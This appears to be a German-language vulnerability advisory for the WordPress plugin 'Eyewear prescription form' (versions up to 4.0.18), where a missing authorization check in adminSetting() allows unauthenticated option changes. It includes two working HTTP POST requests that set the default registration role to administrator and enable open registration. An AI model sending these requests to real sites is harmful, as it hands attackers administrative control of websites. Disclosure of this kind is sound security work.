
Eyewear prescription form <= 4.0.18 - Fehlende Autorisierung für nicht authentifizierte beliebige Optionsaktualisierung
Brillen-Rezeptformular <= 4.0.18 – Fehlende Autorisierung führt zu nicht authentifizierter beliebiger Aktualisierung von Optionen
Das Eyewear Prescription Form Plugin für WordPress ist anfällig für unbefugte Datenänderungen, die zu einer Privilegieneskalation führen können, da in allen Versionen bis einschließlich 4.0.18 eine Berechtigungsprüfung in der Funktion adminSetting() fehlt. Dies ermöglicht es nicht authentifizierten Angreifern, beliebige Optionen auf der WordPress-Seite zu aktualisieren. Dies kann genutzt werden, um die Standardrolle für die Registrierung auf Administrator zu setzen und die Benutzerregistrierung zu aktivieren, sodass Angreifer administrative Benutzerzugriffe auf eine verwundbare Website erhalten.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=default_role&data[settingValue]=administrator
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 84
action=adminSetting&data[settingCode]=users_can_register&data[settingValue]=1